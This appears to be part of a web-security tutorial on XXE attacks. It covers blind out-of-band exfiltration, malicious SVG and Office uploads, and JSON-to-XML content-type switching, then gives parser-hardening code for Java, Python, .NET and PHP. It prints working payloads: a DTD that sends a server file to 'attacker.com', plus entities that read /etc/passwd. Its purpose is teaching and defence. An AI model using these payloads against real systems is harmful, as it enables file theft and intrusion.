<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM
  'http://attacker.com/?data=%file;'>">
%eval;
%exfil;

The parser loads the external DTD, reads the target file into the %file; parameter entity, constructs a URL containing the file data, and makes an HTTP request to the attacker's server — exfiltrating the data in the URL query string. This works even when no XML output is reflected to the attacker.

Figure 3 — Blind XXE via out-of-band (OOB) data exfiltration
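On the receiving side, the exfiltrated value is simply the data query parameter of the request that reaches the attacker-controlled server. A minimal sketch of pulling it out of a logged request path, using only Python's standard library; the function name extract_exfil is hypothetical and the parameter name data is taken from the evil.dtd example above.

```python
from typing import Optional
from urllib.parse import parse_qs, urlsplit


def extract_exfil(request_path: str, param: str = "data") -> Optional[str]:
    """Return the first value of `param` in a request path, or None if absent."""
    query = parse_qs(urlsplit(request_path).query, keep_blank_values=True)
    values = query.get(param)
    return values[0] if values else None
```

For example, a logged request for /?data=web01.internal yields web01.internal. Single-line files such as /etc/hostname tend to survive this channel; whether multi-line content does depends on how the target's parser builds and validates the URL.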

XXE via file upload

Many common file formats are XML-based internally. Uploading a malicious file in one of these formats can trigger XXE processing even when the application doesn't appear to accept XML input:

SVG images — SVG is XML. A malicious SVG with an XXE payload can trigger when the server processes the image (thumbnail generation, rendering, metadata extraction).
DOCX / XLSX / PPTX — Microsoft Office Open XML formats are ZIP archives containing XML files. Replacing [Content_Types].xml or other internal XML files with XXE payloads can trigger the vulnerability when the server parses the document.
SOAP endpoints — SOAP is inherently XML-based. DTD declarations injected into SOAP envelopes are frequently processed by the underlying XML parser.

# Malicious SVG file (upload as profile picture, etc.):
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg xmlns="http://www.w3.org/2000/svg">
  <text x="0" y="20">&xxe;</text>
</svg>

Content-type switching (JSON to XML)

Some application frameworks accept both JSON and XML based on the Content-Type header. If an API endpoint normally expects JSON, switching the Content-Type to application/xml or text/xml may cause the server to route the body through an XML parser — even if the developers never intended to accept XML input. This is particularly common with Java-based REST frameworks (JAX-RS, Spring MVC).

# Original JSON request:
POST /api/login HTTP/1.1
Content-Type: application/json

{"username": "admin", "password": "test"}

# Switched to XML with XXE:
POST /api/login HTTP/1.1
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>
  <username>&xxe;</username>
  <password>test</password>
</root>
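One way to close this vector on the server is to compare the media type of every request against an explicit allowlist before the body reaches any parser. The following is a framework-neutral sketch; ALLOWED_MEDIA_TYPES, media_type and is_allowed are illustrative names, and in a real application the check would live in whatever middleware or filter hook the framework provides.

```python
# Endpoints in this sketch are assumed to accept JSON only.
ALLOWED_MEDIA_TYPES = frozenset({"application/json"})


def media_type(content_type_header: str) -> str:
    """Strip parameters such as charset and normalize case."""
    return content_type_header.split(";", 1)[0].strip().lower()


def is_allowed(content_type_header: str) -> bool:
    """True only if the request's media type is on the allowlist."""
    return media_type(content_type_header) in ALLOWED_MEDIA_TYPES
```

A request that fails the check would typically be rejected with 415 Unsupported Media Type, so the XML body from the switched request above never reaches an XML parser.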

Mitigation of XXE vulnerabilities

The primary defense is to disable DTD processing and external entity resolution in your XML parser. The exact configuration varies by language and library:

Java (DocumentBuilderFactory)

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();

// Disable DTDs entirely (most secure)
dbf.setFeature(
  "http://apache.org/xml/features/disallow-doctype-decl", true);

// If DTDs can't be disabled, at minimum disable external entities
dbf.setFeature(
  "http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature(
  "http://xml.org/sax/features/external-parameter-entities", false);
dbf.setFeature(
  "http://apache.org/xml/features/nonvalidating/load-external-dtd",
  false);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);

Python (lxml / defusedxml)

# Use defusedxml — drop-in replacement that blocks XXE by default
import defusedxml.ElementTree as ET
tree = ET.parse('input.xml')

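# Or with lxml, disable network access and entity resolution
from lxml import etree
parser = etree.XMLParser(
    resolve_entities=False,
    no_network=True,
    dtd_validation=False,
    load_dtd=False
)
# The hardened parser only takes effect when it is passed explicitly
tree = etree.parse('input.xml', parser)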

.NET (XmlReaderSettings)

XmlReaderSettings settings = new XmlReaderSettings();
settings.DtdProcessing = DtdProcessing.Prohibit;
settings.XmlResolver = null;

XmlReader reader = XmlReader.Create(stream, settings);

PHP (libxml)

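// PHP < 8.0 only: disable entity loading before any XML parsing
// (the function is deprecated as of PHP 8.0)
if (\PHP_VERSION_ID < 80000) {
    libxml_disable_entity_loader(true);
}

// For SimpleXML: do NOT pass LIBXML_NOENT. Despite its name, that flag
// turns entity substitution ON and re-enables XXE.
// LIBXML_NONET blocks network access while loading documents.
$xml = simplexml_load_string($data, 'SimpleXMLElement', LIBXML_NONET);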

Important: libxml_disable_entity_loader() is deprecated in PHP 8.0+ because libxml2 >= 2.9.0 disables external entity loading by default. However, always verify your specific PHP and libxml2 versions — older deployments may still be vulnerable.

General hardening principles

Disable DTD processing entirely — this is the most effective defense. If your application doesn't need DTD validation (and almost none do), disable the DOCTYPE declaration completely.
Use allowlists for external entity URIs — if external entities are genuinely needed, restrict them to known-good URIs only.
Validate Content-Type headers — reject XML content types on endpoints that should only accept JSON. This blocks content-type switching attacks.
Scan uploaded files — inspect DOCX, XLSX, SVG, and other XML-based file formats for DTD declarations before processing them.
Apply network-level controls — even if XXE is exploited, egress filtering, IMDSv2 enforcement, and network segmentation limit the blast radius.
Use SAST tools — static analysis can identify insecure XML parser configurations. Tools like Semgrep have built-in rules for XXE detection across multiple languages.
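The "scan uploaded files" principle can be sketched with Python's standard library alone. This is an illustration under assumptions, not a complete upload filter: the names xml_has_doctype and upload_is_clean are hypothetical, only members ending in .xml or .rels are inspected inside ZIP-based formats, and there is no limit on archive size, which a production filter would need.

```python
import io
import zipfile
from xml.parsers import expat


class _DoctypeFound(Exception):
    """Raised from the handler to abort parsing as soon as a DOCTYPE appears."""


def xml_has_doctype(data: bytes) -> bool:
    """True if the XML document declares a DOCTYPE; parsing stops right there."""
    parser = expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise _DoctypeFound(name)

    parser.StartDoctypeDeclHandler = on_doctype
    try:
        parser.Parse(data, True)
    except _DoctypeFound:
        return True
    return False


def upload_is_clean(data: bytes) -> bool:
    """False if any inspected XML part has a DOCTYPE or is not well-formed."""
    try:
        if zipfile.is_zipfile(io.BytesIO(data)):  # DOCX, XLSX, PPTX, ...
            with zipfile.ZipFile(io.BytesIO(data)) as archive:
                return not any(
                    xml_has_doctype(archive.read(name))
                    for name in archive.namelist()
                    if name.lower().endswith((".xml", ".rels"))
                )
        return not xml_has_doctype(data)  # plain XML such as SVG
    except expat.ExpatError:
        return False  # malformed XML is rejected rather than passed on
```

Aborting inside the DOCTYPE handler means the entity declarations that follow are never processed, so the check itself does not expand or fetch anything.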

Summary

When an application is vulnerable to XXE, an attacker may be able to read files from the web server's file system, cause denial of service (via /dev/random or recursive entity expansion), perform SSRF against internal services, exfiltrate data over out-of-band channels, or even achieve XSS through XML-to-HTML reflection. Modern XXE often arrives through non-obvious vectors: SVG uploads, Office documents, SOAP endpoints, and content-type switching on REST APIs.